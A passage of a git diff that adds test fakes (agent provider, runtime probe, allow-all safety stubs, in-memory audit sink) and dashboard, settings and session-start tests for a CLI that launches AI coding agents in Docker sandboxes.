Path, + ) -> None: + desc = runner.describe() + assert isinstance(desc, str) + assert len(desc) > 0 + + def test_env_is_empty_dict( + self, + label: str, + runner: AgentRunner, + expected_argv0: str, + expected_settings_path: Path, + ) -> None: + """D003 contract guard: env dict should be clean str→str.""" + settings = runner.build_settings({}, path=expected_settings_path) + command = runner.build_command(settings) + assert command.env == {} diff --git a/tests/contracts/test_sandbox_runtime_contract.py b/tests/contracts/test_sandbox_runtime_contract.py index 707ec91..f00d35d 100644 --- a/tests/contracts/test_sandbox_runtime_contract.py +++ b/tests/contracts/test_sandbox_runtime_contract.py @@ -17,6 +17,8 @@ def test_sandbox_runtime_lifecycle(tmp_path: Path) -> None: runtime = FakeSandboxRuntime() spec = _make_spec(tmp_path) + assert runtime.detect_launch_conflict(spec) is None + handle = runtime.run(spec) assert runtime.status(handle).state == SandboxState.RUNNING diff --git a/tests/fakes/__init__.py b/tests/fakes/__init__.py index 9dd8e79..5653d94 100644 --- a/tests/fakes/__init__.py +++ b/tests/fakes/__init__.py @@ -2,6 +2,8 @@ from __future__ import annotations +from dataclasses import dataclass, field + from scc_cli.adapters.local_config_store import LocalConfigStore from scc_cli.adapters.local_dependency_installer import LocalDependencyInstaller from scc_cli.adapters.local_doctor_runner import LocalDoctorRunner @@ -12,10 +14,28 @@ from scc_cli.adapters.system_clock import SystemClock from scc_cli.adapters.zip_archive_writer import ZipArchiveWriter from scc_cli.bootstrap import DefaultAdapters +from scc_cli.core.contracts import AuditEvent +from tests.fakes.fake_agent_provider import FakeAgentProvider from tests.fakes.fake_agent_runner import FakeAgentRunner +from tests.fakes.fake_runtime_probe import FakeRuntimeProbe +from tests.fakes.fake_safety_adapter import FakeSafetyAdapter +from tests.fakes.fake_safety_engine import FakeSafetyEngine from tests.fakes.fake_sandbox_runtime import FakeSandboxRuntime +@dataclass +class FakeAuditEventSink: + """In-memory audit sink for CLI and integration tests.""" + + events: list[AuditEvent] = field(default_factory=list) + + def append(self, event: AuditEvent) -> None: + self.events.append(event) + + def describe_destination(self) -> str: + return "memory://launch-events" + + def build_fake_adapters() -> DefaultAdapters: """Return default adapters wired with fakes.""" return DefaultAdapters( @@ -25,9 +45,17 @@ def build_fake_adapters() -> DefaultAdapters: remote_fetcher=RequestsFetcher(), clock=SystemClock(), agent_runner=FakeAgentRunner(), + agent_provider=FakeAgentProvider(), sandbox_runtime=FakeSandboxRuntime(), personal_profile_service=LocalPersonalProfileService(), doctor_runner=LocalDoctorRunner(), archive_writer=ZipArchiveWriter(), config_store=LocalConfigStore(), + audit_event_sink=FakeAuditEventSink(), + codex_agent_provider=FakeAgentProvider(), + codex_agent_runner=FakeAgentRunner(), + runtime_probe=FakeRuntimeProbe(), + safety_engine=FakeSafetyEngine(), + claude_safety_adapter=FakeSafetyAdapter(), + codex_safety_adapter=FakeSafetyAdapter(), ) diff --git a/tests/fakes/fake_agent_provider.py b/tests/fakes/fake_agent_provider.py new file mode 100644 index 0000000..022c0c4 --- /dev/null +++ b/tests/fakes/fake_agent_provider.py @@ -0,0 +1,71 @@ +"""Fake AgentProvider for tests.""" + +from __future__ import annotations + +from collections.abc import Mapping +from pathlib import Path +from typing import Any + +from scc_cli.core.contracts import ( + AgentLaunchSpec, + AuthReadiness, + ProviderCapabilityProfile, + RenderArtifactsResult, +) +from scc_cli.core.governed_artifacts import ArtifactRenderPlan + + +class FakeAgentProvider: + """Simple AgentProvider stub for unit tests.""" + + def __init__(self) -> None: + self.render_artifacts_calls: list[tuple[ArtifactRenderPlan, Path]] = [] + + def capability_profile(self) -> ProviderCapabilityProfile: + return ProviderCapabilityProfile( + provider_id="fake", + display_name="Fake provider", + required_destination_set="fake-core", + supports_resume=True, + supports_skills=True, + ) + + def auth_check(self) -> AuthReadiness: + return AuthReadiness( + status="present", + mechanism="fake", + guidance="Fake auth always present", + ) + + def bootstrap_auth(self) -> None: + return None + + def prepare_launch( + self, + *, + config: Mapping[str, Any], + workspace: Path, + settings_path: Path | None = None, + ) -> AgentLaunchSpec: + artifact_paths = (settings_path,) if settings_path is not None else () + return AgentLaunchSpec( + provider_id="fake", + argv=("fake-agent",), + env={"HAS_SETTINGS": "1"} if config else {}, + workdir=workspace, + artifact_paths=artifact_paths, + required_destination_sets=("fake-core",), + ) + + def render_artifacts( + self, + plan: ArtifactRenderPlan, + workspace: Path, + ) -> RenderArtifactsResult: + self.render_artifacts_calls.append((plan, workspace)) + return RenderArtifactsResult( + rendered_paths=(), + skipped_artifacts=plan.skipped, + warnings=(), + settings_fragment={}, + ) diff --git a/tests/fakes/fake_agent_runner.py b/tests/fakes/fake_agent_runner.py index 6aa9d27..86a6ae1 100644 --- a/tests/fakes/fake_agent_runner.py +++ b/tests/fakes/fake_agent_runner.py @@ -2,6 +2,7 @@ from __future__ import annotations +import json from pathlib import Path from typing import Any @@ -12,7 +13,8 @@ class FakeAgentRunner: """Simple AgentRunner stub for unit tests.""" def build_settings(self, config: dict[str, Any], *, path: Path) -> AgentSettings: - return AgentSettings(content=config, path=path) + rendered = json.dumps(config, indent=2, sort_keys=True).encode() + return AgentSettings(rendered_bytes=rendered, path=path, suffix=".json") def build_command(self, settings: AgentSettings) -> AgentCommand: return AgentCommand(argv=["fake-agent"], env={}, workdir=settings.path.parent) diff --git a/tests/fakes/fake_runtime_probe.py b/tests/fakes/fake_runtime_probe.py new file mode 100644 index 0000000..818ba50 --- /dev/null +++ b/tests/fakes/fake_runtime_probe.py @@ -0,0 +1,30 @@ +"""Fake RuntimeProbe for tests.""" + +from __future__ import annotations + +from scc_cli.core.contracts import RuntimeInfo + +# Default: fully-capable Docker Desktop scenario. +_DEFAULT_RUNTIME_INFO = RuntimeInfo( + runtime_id="docker", + display_name="Docker Desktop", + cli_name="docker", + supports_oci=True, + supports_internal_networks=True, + supports_host_network=True, + version="Docker version 27.5.1, build abc1234", + desktop_version="4.50.0", + daemon_reachable=True, + sandbox_available=True, + preferred_backend="docker-sandbox", +) + + +class FakeRuntimeProbe: + """In-memory runtime probe returning configurable RuntimeInfo.""" + + def __init__(self, info: RuntimeInfo | None = None) -> None: + self._info = info or _DEFAULT_RUNTIME_INFO + + def probe(self) -> RuntimeInfo: + return self._info diff --git a/tests/fakes/fake_safety_adapter.py b/tests/fakes/fake_safety_adapter.py new file mode 100644 index 0000000..7dad7f0 --- /dev/null +++ b/tests/fakes/fake_safety_adapter.py @@ -0,0 +1,31 @@ +"""Fake SafetyAdapter for tests.""" + +from __future__ import annotations + +from dataclasses import dataclass, field + +from scc_cli.core.contracts import SafetyCheckResult, SafetyPolicy, SafetyVerdict + + +@dataclass +class FakeSafetyAdapter: + """Configurable SafetyAdapter stub for downstream tests. + + By default returns an allowed verdict with empty message and + audit_emitted=False. Set ``result`` to override. Calls are + recorded in ``calls`` for assertion. + """ + + result: SafetyCheckResult = field( + default_factory=lambda: SafetyCheckResult( + verdict=SafetyVerdict(allowed=True, reason="fake: allow-all"), + user_message="", + audit_emitted=False, + ), + ) + calls: list[tuple[str, SafetyPolicy]] = field(default_factory=list) + + def check_command(self, command: str, policy: SafetyPolicy) -> SafetyCheckResult: + """Record the call and return the configured result.""" + self.calls.append((command, policy)) + return self.result diff --git a/tests/fakes/fake_safety_engine.py b/tests/fakes/fake_safety_engine.py new file mode 100644 index 0000000..6793a68 --- /dev/null +++ b/tests/fakes/fake_safety_engine.py @@ -0,0 +1,27 @@ +"""Fake SafetyEngine for tests.""" + +from __future__ import annotations + +from dataclasses import dataclass, field + +from scc_cli.core.contracts import SafetyPolicy, SafetyVerdict + + +@dataclass +class FakeSafetyEngine: + """Configurable SafetyEngine stub for unit tests. + + By default returns an allow-all verdict. Set ``verdict`` to + override the return value for all calls. Calls are recorded + in ``calls`` for downstream assertion. + """ + + verdict: SafetyVerdict = field( + default_factory=lambda: SafetyVerdict(allowed=True, reason="fake: allow-all"), + ) + calls: list[tuple[str, SafetyPolicy]] = field(default_factory=list) + + def evaluate(self, command: str, policy: SafetyPolicy) -> SafetyVerdict: + """Record the call and return the configured verdict.""" + self.calls.append((command, policy)) + return self.verdict diff --git a/tests/fakes/fake_sandbox_runtime.py b/tests/fakes/fake_sandbox_runtime.py index 9a0f01e..a597b7c 100644 --- a/tests/fakes/fake_sandbox_runtime.py +++ b/tests/fakes/fake_sandbox_runtime.py @@ -4,7 +4,13 @@ from dataclasses import dataclass -from scc_cli.ports.models import SandboxHandle, SandboxSpec, SandboxState, SandboxStatus +from scc_cli.ports.models import ( + SandboxConflict, + SandboxHandle, + SandboxSpec, + SandboxState, + SandboxStatus, +) @dataclass @@ -30,6 +36,9 @@ def run(self, spec: SandboxSpec) -> SandboxHandle: self._records[handle.sandbox_id] = _SandboxRecord(handle=handle, status=status) return handle + def detect_launch_conflict(self, spec: SandboxSpec) -> SandboxConflict | None: + return None + def resume(self, handle: SandboxHandle) -> None: record = self._records.get(handle.sandbox_id) if record: diff --git a/tests/test_app_dashboard_characterization.py b/tests/test_app_dashboard_characterization.py new file mode 100644 index 0000000..4f86503 --- /dev/null +++ b/tests/test_app_dashboard_characterization.py @@ -0,0 +1,439 @@ +"""Characterization tests for application/dashboard.py. + +Lock the current behavior of dashboard view model types, event routing, +and effect application logic before S02 surgery. Complements T02's +orchestrator characterization by covering the application-layer flow. +""" + +from __future__ import annotations + +from unittest.mock import MagicMock + +import pytest + +from scc_cli.application.dashboard import ( + ContainerStopEvent, + CreateWorktreeEvent, + DashboardEffectRequest, + DashboardFlowOutcome, + DashboardFlowState, + DashboardTab, + DashboardTabData, + GitInitEvent, + PlaceholderItem, + PlaceholderKind, + RecentWorkspacesEvent, + RefreshEvent, + SessionResumeEvent, + SettingsEvent, + StartFlowDecision, + StartFlowEvent, + StartFlowResult, + StatusAction, + StatusItem, + StatuslineInstallEvent, + TeamSwitchEvent, + VerboseToggleEvent, + WorktreeItem, + apply_dashboard_effect_result, + build_dashboard_view, + handle_dashboard_event, +) +from scc_cli.ports.session_models import SessionSummary + +# ═════════════════════════════════════════════��═════════════════════════════════ +# View model types +# ═══════════════════════════���═══════════════════════════════════════���═══════════ + + +class TestDashboardTab: + """Tab enum display names are stable.""" + + def test_display_names(self) -> None: + assert DashboardTab.STATUS.display_name == "Status" + assert DashboardTab.CONTAINERS.display_name == "Containers" + assert DashboardTab.SESSIONS.display_name == "Sessions" + assert DashboardTab.WORKTREES.display_name == "Worktrees" + + +class TestDashboardTabData: + """Tab data subtitle generation.""" + + def test_subtitle_same_counts(self) -> None: + data = DashboardTabData( + tab=DashboardTab.CONTAINERS, + title="Containers", + items=[], + count_active=3, + count_total=3, + ) + assert data.subtitle == "3 total" + + def test_subtitle_different_counts(self) -> None: + data = DashboardTabData( + tab=DashboardTab.CONTAINERS, + title="Containers", + items=[], + count_active=2, + count_total=5, + ) + assert data.subtitle == "2 active, 5 total" + + +class TestStartFlowResult: + """Legacy bool/None conversion.""" + + def test_from_legacy_none_is_quit(self) -> None: + result = StartFlowResult.from_legacy(None) + assert result.decision is StartFlowDecision.QUIT + + def test_from_legacy_true_is_launched(self) -> None: + result = StartFlowResult.from_legacy(True) + assert result.decision is StartFlowDecision.LAUNCHED + + def test_from_legacy_false_is_cancelled(self) -> None: + result = StartFlowResult.from_legacy(False) + assert result.decision is StartFlowDecision.CANCELLED + assert result.message is None + + +# ══════════��══════════════════════════════════════════════════════���═════════════ +# build_dashboard_view +# ══════════════════════════════════════════════════════��════════════════════════ + + +class TestBuildDashboardView: + """View building and one-time state clearing.""" + + def _make_loader(self) -> MagicMock: + """Stub loader returning minimal tab data.""" + tab_data = { + DashboardTab.STATUS: DashboardTabData( + tab=DashboardTab.STATUS, + title="Status", + items=[], + count_active=0, + count_total=0, + ), + } + return MagicMock(return_value=tab_data) + + def test_default_active_tab_is_status(self) -> None: + state = DashboardFlowState() + view, next_state = build_dashboard_view(state, self._make_loader()) + assert view.active_tab == DashboardTab.STATUS + + def test_restore_tab_honored(self) -> None: + loader = self._make_loader() + loader.return_value[DashboardTab.CONTAINERS] = DashboardTabData( + tab=DashboardTab.CONTAINERS, + title="Containers", + items=[], + count_active=0, + count_total=0, + ) + state = DashboardFlowState(restore_tab=DashboardTab.CONTAINERS) + view, _ = build_dashboard_view(state, loader) + assert view.active_tab == DashboardTab.CONTAINERS + + def test_restore_tab_cleared_after_view(self) -> None: + state = DashboardFlowState(restore_tab=DashboardTab.SESSIONS) + _, next_state = build_dashboard_view(state, self._make_loader()) + assert next_state.restore_tab is None + + def test_toast_cleared_after_view(self) -> None: + state = DashboardFlowState(toast_message="Hello") + view, next_state = build_dashboard_view(state, self._make_loader()) + assert view.status_message == "Hello" + assert next_state.toast_message is None + + def test_invalid_restore_tab_falls_back_to_status(self) -> None: + state = DashboardFlowState(restore_tab=DashboardTab.WORKTREES) + # Loader only has STATUS tab + view, _ = build_dashboard_view(state, self._make_loader()) + assert view.active_tab == DashboardTab.STATUS + + +# ══════════════════════════════��═══════════════════════════════════════��════════ +# handle_dashboard_event — routing +# ════════════════════════════════════���══════════════════════════════════════════ + + +class TestHandleDashboardEvent: + """Event-to-outcome routing.""" + + def test_team_switch_returns_effect(self) -> None: + state = DashboardFlowState() + result = handle_dashboard_event(state, TeamSwitchEvent()) + assert isinstance(result, DashboardEffectRequest) + + def test_refresh_returns_outcome(self) -> None: + state = DashboardFlowState() + result = handle_dashboard_event(state, RefreshEvent(return_to=DashboardTab.STATUS)) + assert isinstance(result, DashboardFlowOutcome) + + def test_verbose_toggle_sets_state(self) -> None: + state = DashboardFlowState(verbose_worktrees=False) + result = handle_dashboard_event( + state, VerboseToggleEvent(return_to=DashboardTab.WORKTREES, verbose=True) + ) + assert isinstance(result, DashboardFlowOutcome) + assert result.state.verbose_worktrees is True + assert result.state.toast_message == "Status on" + + def test_verbose_toggle_off(self) -> None: + state = DashboardFlowState(verbose_worktrees=True) + result = handle_dashboard_event( + state, VerboseToggleEvent(return_to=DashboardTab.WORKTREES, verbose=False) + ) + assert isinstance(result, DashboardFlowOutcome) + assert result.state.verbose_worktrees is False + assert result.state.toast_message == "Status off" + + def test_start_flow_preserves_return_tab(self) -> None: + state = DashboardFlowState() + result = handle_dashboard_event( + state, StartFlowEvent(return_to=DashboardTab.CONTAINERS, reason="test") + ) + assert isinstance(result, DashboardEffectRequest) + assert result.state.restore_tab == DashboardTab.CONTAINERS + + def test_settings_returns_effect(self) -> None: + state = DashboardFlowState() + result = handle_dashboard_event(state, SettingsEvent(return_to=DashboardTab.STATUS)) + assert isinstance(result, DashboardEffectRequest) + + def test_unsupported_event_raises(self) -> None: + state = DashboardFlowState() + with pytest.raises(ValueError, match="Unsupported event"): + handle_dashboard_event(state, "not_an_event") # type: ignore[arg-type] + + +# ════════════════════════════���══════════════════════════════════════════════════ +# apply_dashboard_effect_result +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestApplyDashboardEffectResult: + """Effect result application to state.""" + + def test_start_flow_quit_exits(self) -> None: + state = DashboardFlowState() + result = apply_dashboard_effect_result( + state, + StartFlowEvent(return_to=DashboardTab.STATUS, reason="test"), + StartFlowResult(decision=StartFlowDecision.QUIT), + ) + assert result.exit_dashboard is True + + def test_start_flow_launched_exits(self) -> None: + state = DashboardFlowState() + result = apply_dashboard_effect_result( + state, + StartFlowEvent(return_to=DashboardTab.STATUS, reason="test"), + StartFlowResult(decision=StartFlowDecision.LAUNCHED), + ) + assert result.exit_dashboard is True + + def test_start_flow_cancelled_continues(self) -> None: + state = DashboardFlowState() + result = apply_dashboard_effect_result( + state, + StartFlowEvent(return_to=DashboardTab.STATUS, reason="test"), + StartFlowResult(decision=StartFlowDecision.CANCELLED), + ) + assert result.exit_dashboard is not True + assert result.state.toast_message == "Start cancelled" + + def test_start_flow_cancelled_uses_specific_message(self) -> None: + state = DashboardFlowState() + result = apply_dashboard_effect_result( + state, + StartFlowEvent(return_to=DashboardTab.STATUS, reason="test"), + StartFlowResult( + decision=StartFlowDecision.CANCELLED, + message="Kept existing sandbox", + ), + ) + assert result.exit_dashboard is not True + assert result.state.toast_message == "Kept existing sandbox" + + def test_session_resume_success_exits(self) -> None: + session = MagicMock(spec=SessionSummary) + state = DashboardFlowState() + result = apply_dashboard_effect_result( + state, + SessionResumeEvent(return_to=DashboardTab.SESSIONS, session=session), + True, + ) + assert result.exit_dashboard is True + + def test_session_resume_failure_shows_toast(self) -> None: + session = MagicMock(spec=SessionSummary) + state = DashboardFlowState() + result = apply_dashboard_effect_result( + state, + SessionResumeEvent(return_to=DashboardTab.SESSIONS, session=session), + False, + ) + assert result.state.toast_message == "Session resume failed" + + def test_statusline_install_success(self) -> None: + state = DashboardFlowState() + result = apply_dashboard_effect_result( + state, + StatuslineInstallEvent(return_to=DashboardTab.STATUS), + True, + ) + assert result.state.toast_message is not None + assert "installed" in result.state.toast_message.lower() + + def test_statusline_install_failure(self) -> None: + state = DashboardFlowState() + result = apply_dashboard_effect_result( + state, + StatuslineInstallEvent(return_to=DashboardTab.STATUS), + False, + ) + assert result.state.toast_message is not None + assert "failed" in result.state.toast_message.lower() + + def test_container_stop_success(self) -> None: + state = DashboardFlowState() + result = apply_dashboard_effect_result( + state, + ContainerStopEvent( + return_to=DashboardTab.CONTAINERS, container_id="abc", container_name="c1" + ), + (True, None), + ) + assert result.state.toast_message is not None + assert "stopped" in result.state.toast_message.lower() + + def test_container_stop_failure(self) -> None: + state = DashboardFlowState() + result = apply_dashboard_effect_result( + state, + ContainerStopEvent( + return_to=DashboardTab.CONTAINERS, container_id="abc", container_name="c1" + ), + (False, "Error: connection refused"), + ) + assert result.state.toast_message is not None + assert "connection refused" in result.state.toast_message.lower() + + def test_container_stop_invalid_result_raises(self) -> None: + state = DashboardFlowState() + with pytest.raises(TypeError, match="Container effect"): + apply_dashboard_effect_result( + state, + ContainerStopEvent( + return_to=DashboardTab.CONTAINERS, container_id="a", container_name="c" + ), + "not_a_tuple", + ) + + def test_git_init_success(self) -> None: + state = DashboardFlowState() + result = apply_dashboard_effect_result( + state, GitInitEvent(return_to=DashboardTab.STATUS), True + ) + assert result.state.toast_message is not None + assert "initialized" in result.state.toast_message.lower() + + def test_create_worktree_git_repo(self) -> None: + state = DashboardFlowState() + result = apply_dashboard_effect_result( + state, + CreateWorktreeEvent(return_to=DashboardTab.WORKTREES, is_git_repo=True), + True, + ) + assert result.state.toast_message is not None + assert "worktree created" in result.state.toast_message.lower() + + def test_create_worktree_clone(self) -> None: + state = DashboardFlowState() + result = apply_dashboard_effect_result( + state, + CreateWorktreeEvent(return_to=DashboardTab.WORKTREES, is_git_repo=False), + True, + ) + assert result.state.toast_message is not None + assert "cloned" in result.state.toast_message.lower() + + def test_settings_result_applied(self) -> None: + state = DashboardFlowState() + result = apply_dashboard_effect_result( + state, + SettingsEvent(return_to=DashboardTab.STATUS), + "Settings saved", + ) + assert result.state.toast_message == "Settings saved" + + def test_recent_workspaces_selected(self) -> None: + state = DashboardFlowState() + result = apply_dashboard_effect_result( + state, + RecentWorkspacesEvent(return_to=DashboardTab.STATUS), + "/path/to/workspace", + ) + assert result.state.toast_message is not None + assert "/path/to/workspace" in result.state.toast_message + + def test_recent_workspaces_cancelled(self) -> None: + state = DashboardFlowState() + result = apply_dashboard_effect_result( + state, + RecentWorkspacesEvent(return_to=DashboardTab.STATUS), + None, + ) + assert result.state.toast_message == "Cancelled" + + def test_unsupported_effect_raises(self) -> None: + state = DashboardFlowState() + with pytest.raises(ValueError, match="Unsupported effect"): + apply_dashboard_effect_result(state, "not_an_effect", None) # type: ignore[arg-type] + + def test_start_flow_wrong_type_raises(self) -> None: + state = DashboardFlowState() + with pytest.raises(TypeError, match="StartFlowResult"): + apply_dashboard_effect_result( + state, + StartFlowEvent(return_to=DashboardTab.STATUS, reason="test"), + "wrong_type", + ) + + +# ═════════════��═════════════════════════════════════════════════════════════════ +# Placeholder and item types +# ══════════════════════════════��════════════════════════════════════════════════ + + +class TestItemTypes: + """View model item frozen dataclass construction.""" + + def test_status_item(self) -> None: + item = StatusItem(label="Start Session", description="Launch a new session") + assert item.label == "Start Session" + assert item.action is None + + def test_status_item_with_action(self) -> None: + item = StatusItem( + label="Start", + description="Start", + action=StatusAction.START_SESSION, + ) + assert item.action is StatusAction.START_SESSION + + def test_placeholder_item(self) -> None: + item = PlaceholderItem( + label="No containers", + description="No Docker containers running", + kind=PlaceholderKind.NO_CONTAINERS, + ) + assert item.startable is False + assert item.kind is PlaceholderKind.NO_CONTAINERS + + def test_worktree_item(self) -> None: + item = WorktreeItem(label="main", description="/path/to/main", path="/path/to/main") + assert item.path == "/path/to/main" diff --git a/tests/test_application_dashboard.py b/tests/test_application_dashboard.py index 27e8be3..8051bc2 100644 --- a/tests/test_application_dashboard.py +++ b/tests/test_application_dashboard.py @@ -2,7 +2,10 @@ from __future__ import annotations +from typing import cast + from scc_cli.application import dashboard as app_dashboard +from scc_cli.ports.session_models import SessionSummary def _empty_tab_data(tab: app_dashboard.DashboardTab) -> app_dashboard.DashboardTabData: @@ -66,11 +69,31 @@ def test_start_flow_cancel_sets_toast() -> None: assert outcome.state.toast_message == "Start cancelled" +def test_start_flow_cancel_uses_specific_message_when_provided() -> None: + state = app_dashboard.DashboardFlowState() + effect = app_dashboard.StartFlowEvent( + return_to=app_dashboard.DashboardTab.STATUS, + reason="dashboard_start", + ) + + outcome = app_dashboard.apply_dashboard_effect_result( + state, + effect, + app_dashboard.StartFlowResult( + decision=app_dashboard.StartFlowDecision.CANCELLED, + message="Kept existing sandbox", + ), + ) + + assert outcome.exit_dashboard is False + assert outcome.state.toast_message == "Kept existing sandbox" + + def test_session_resume_success_exits_dashboard() -> None: state = app_dashboard.DashboardFlowState() effect = app_dashboard.SessionResumeEvent( return_to=app_dashboard.DashboardTab.SESSIONS, - session={"name": "session"}, + session=cast(SessionSummary, {"name": "session"}), ) outcome = app_dashboard.apply_dashboard_effect_result(state, effect, True) diff --git a/tests/test_application_settings.py b/tests/test_application_settings.py index 125b6e5..8c7e59e 100644 --- a/tests/test_application_settings.py +++ b/tests/test_application_settings.py @@ -1,6 +1,7 @@ from __future__ import annotations from pathlib import Path +from unittest.mock import patch from scc_cli import config from scc_cli.application import settings as app_settings @@ -86,3 +87,65 @@ def test_apply_settings_change_profile_sync_export_writes_repo_index( profile_files = [path for path in profiles_dir.glob("*.json") if path.name != "index.json"] assert index_path.exists() assert len(profile_files) == 1 + + +def test_apply_settings_change_support_bundle_requires_payload(tmp_path: Path) -> None: + request = app_settings.SettingsChangeRequest( + action_id="generate_support_bundle", + workspace=tmp_path, + payload=None, + ) + + result = app_settings.apply_settings_change(request) + + assert result.status == app_settings.SettingsActionStatus.ERROR + assert result.error == "missing payload" + + +def test_apply_settings_change_support_bundle_uses_application_bundle_use_case( + tmp_path: Path, +) -> None: + output_path = tmp_path / "support-bundle.zip" + request = app_settings.SettingsChangeRequest( + action_id="generate_support_bundle", + workspace=tmp_path, + payload=app_settings.SupportBundlePayload( + output_path=output_path, + redact_paths=False, + ), + ) + + with ( + patch( + "scc_cli.application.settings.use_cases.build_default_support_bundle_dependencies", + return_value=object(), + ), + patch("scc_cli.application.settings.use_cases.create_support_bundle") as create_bundle, + ): + result = app_settings.apply_settings_change(request) + + support_request = create_bundle.call_args.args[0] + assert support_request.output_path == output_path + assert support_request.redact_paths is False + assert support_request.workspace_path is None + assert result.status == app_settings.SettingsActionStatus.SUCCESS + assert result.detail == app_settings.SupportBundleInfo(output_path=output_path) + + +def test_apply_settings_change_support_bundle_returns_error_when_creation_fails( + tmp_path: Path, +) -> None: + request = app_settings.SettingsChangeRequest( + action_id="generate_support_bundle", + workspace=tmp_path, + payload=app_settings.SupportBundlePayload(output_path=tmp_path / "support-bundle.zip"), + ) + + with patch( + "scc_cli.application.settings.use_cases.create_support_bundle", + side_effect=RuntimeError("archive write failed"), + ): + result = app_settings.apply_settings_change(request) + + assert result.status == app_settings.SettingsActionStatus.ERROR + assert result.error == "archive write failed" diff --git a/tests/test_application_start_session.py b/tests/test_application_start_session.py index c8c7102..296df15 100644 --- a/tests/test_application_start_session.py +++ b/tests/test_application_start_session.py @@ -1,9 +1,13 @@ from __future__ import annotations from pathlib import Path +from typing import Any from unittest.mock import MagicMock, patch +import pytest + from scc_cli.application.compute_effective_config import EffectiveConfig, MCPServer +from scc_cli.application.start_session import _DOCKER_DESKTOP_CLAUDE_IMAGE as SANDBOX_IMAGE from scc_cli.application.start_session import ( StartSessionDependencies, StartSessionPlan, @@ -13,9 +17,22 @@ ) from scc_cli.application.sync_marketplace import SyncError, SyncResult from scc_cli.application.workspace import WorkspaceContext -from scc_cli.core.constants import AGENT_CONFIG_DIR, SANDBOX_IMAGE +from scc_cli.core.contracts import AgentLaunchSpec, RenderArtifactsResult, RuntimeInfo +from scc_cli.core.errors import InvalidProviderError, MaterializationError +from scc_cli.core.governed_artifacts import ( + ArtifactBundle, + ArtifactInstallIntent, + ArtifactKind, + ArtifactRenderPlan, + GovernedArtifact, + ProviderArtifactBinding, +) +from scc_cli.core.image_contracts import SCC_CLAUDE_IMAGE_REF, SCC_CODEX_IMAGE_REF from scc_cli.core.workspace import ResolverResult +from scc_cli.ports.config_models import GovernedArtifactsCatalog, NormalizedOrgConfig from scc_cli.ports.models import MountSpec, SandboxSpec +from scc_cli.services.git.worktree import WorktreeInfo +from tests.fakes.fake_agent_provider import FakeAgentProvider from tests.fakes.fake_agent_runner import FakeAgentRunner from tests.fakes.fake_sandbox_runtime import FakeSandboxRuntime @@ -49,6 +66,52 @@ def detect_workspace_root(self, start_dir: Path) -> tuple[Path | None, Path]: def get_current_branch(self, path: Path) -> str | None: return self._branch + def has_commits(self, path: Path) -> bool: + return True + + def has_remote(self, path: Path) -> bool: + return True + + def get_default_branch(self, path: Path) -> str: + return "main" + + def list_worktrees(self, path: Path) -> list[WorktreeInfo]: + return [] + + def get_worktree_status(self, path: Path) -> tuple[int, int, int, bool]: + return (0, 0, 0, False) + + def find_worktree_by_query( + self, + path: Path, + query: str, + ) -> tuple[WorktreeInfo | None, list[WorktreeInfo]]: + return None, [] + + def find_main_worktree(self, path: Path) -> WorktreeInfo | None: + return None + + def list_branches_without_worktrees(self, path: Path) -> list[str]: + return [] + + def fetch_branch(self, path: Path, branch: str) -> None: + return None + + def add_worktree( + self, + repo_path: Path, + worktree_path: Path, + branch_name: str, + base_branch: str, + ) -> None: + return None + + def remove_worktree(self, repo_path: Path, worktree_path: Path, *, force: bool) -> None: + return None + + def prune_worktrees(self, repo_path: Path) -> None: + return None + def _build_resolver_result(workspace_path: Path) -> ResolverResult: resolved = workspace_path.resolve() @@ -70,6 +133,7 @@ def _build_dependencies(git_client: FakeGitClient) -> StartSessionDependencies: clock=MagicMock(), git_client=git_client, agent_runner=FakeAgentRunner(), + agent_provider=FakeAgentProvider(), sandbox_runtime=FakeSandboxRuntime(), resolve_effective_config=MagicMock(), materialize_marketplace=MagicMock(), @@ -91,10 +155,17 @@ def test_prepare_start_session_builds_plan_with_sync_result(tmp_path: Path) -> N standalone=False, dry_run=False, allow_suspicious=False, - org_config={ + org_config=NormalizedOrgConfig.from_dict( + { + "defaults": {"network_policy": "restricted"}, + "profiles": {"alpha": {}}, + } + ), + raw_org_config={ "defaults": {"network_policy": "restricted"}, "profiles": {"alpha": {}}, }, + provider_id="claude", ) sync_result = SyncResult(success=True, rendered_settings={"plugins": []}) resolver_result = _build_resolver_result(workspace_path) @@ -119,8 +190,11 @@ def test_prepare_start_session_builds_plan_with_sync_result(tmp_path: Path) -> N assert plan.sync_error_message is None assert plan.current_branch == "main" assert plan.agent_settings is not None - assert plan.agent_settings.content == {"plugins": []} - assert plan.agent_settings.path == Path("/home/agent") / AGENT_CONFIG_DIR / "settings.json" + import json as _json + + parsed = _json.loads(plan.agent_settings.rendered_bytes) + assert parsed == {"plugins": []} + assert plan.agent_settings.path == Path("/home/agent") / ".claude" / "settings.json" assert plan.sandbox_spec is not None assert plan.sandbox_spec.image == SANDBOX_IMAGE assert plan.sandbox_spec.network_policy == "restricted" @@ -129,6 +203,10 @@ def test_prepare_start_session_builds_plan_with_sync_result(tmp_path: Path) -> N def test_prepare_start_session_captures_sync_error(tmp_path: Path) -> None: workspace_path = tmp_path / "workspace" workspace_path.mkdir() + _raw = { + "defaults": {}, + "profiles": {"alpha": {}}, + } request = StartSessionRequest( workspace_path=workspace_path, workspace_arg=str(workspace_path), @@ -141,10 +219,9 @@ def test_prepare_start_session_captures_sync_error(tmp_path: Path) -> None: standalone=False, dry_run=False, allow_suspicious=False, - org_config={ - "defaults": {}, - "profiles": {"alpha": {}}, - }, + org_config=NormalizedOrgConfig.from_dict(_raw), + raw_org_config=_raw, + provider_id="claude", ) resolver_result = _build_resolver_result(workspace_path) dependencies = _build_dependencies(FakeGitClient()) @@ -163,13 +240,23 @@ def test_prepare_start_session_captures_sync_error(tmp_path: Path) -> None: assert plan.sync_result is None assert plan.sync_error_message == "sync failed" - assert plan.agent_settings is None + # D038: fresh launch (resume=False) always produces agent_settings, + # even when sync fails — an empty config overwrites stale volume state. + assert plan.agent_settings is not None + import json as _json + + parsed = _json.loads(plan.agent_settings.rendered_bytes) + assert parsed == {} assert plan.sandbox_spec is not None def test_prepare_start_session_injects_mcp_servers(tmp_path: Path) -> None: workspace_path = tmp_path / "workspace" workspace_path.mkdir() + _raw = { + "defaults": {}, + "profiles": {"alpha": {}}, + } request = StartSessionRequest( workspace_path=workspace_path, workspace_arg=str(workspace_path), @@ -182,10 +269,9 @@ def test_prepare_start_session_injects_mcp_servers(tmp_path: Path) -> None: standalone=False, dry_run=False, allow_suspicious=False, - org_config={ - "defaults": {}, - "profiles": {"alpha": {}}, - }, + org_config=NormalizedOrgConfig.from_dict(_raw), + raw_org_config=_raw, + provider_id="claude", ) sync_result = 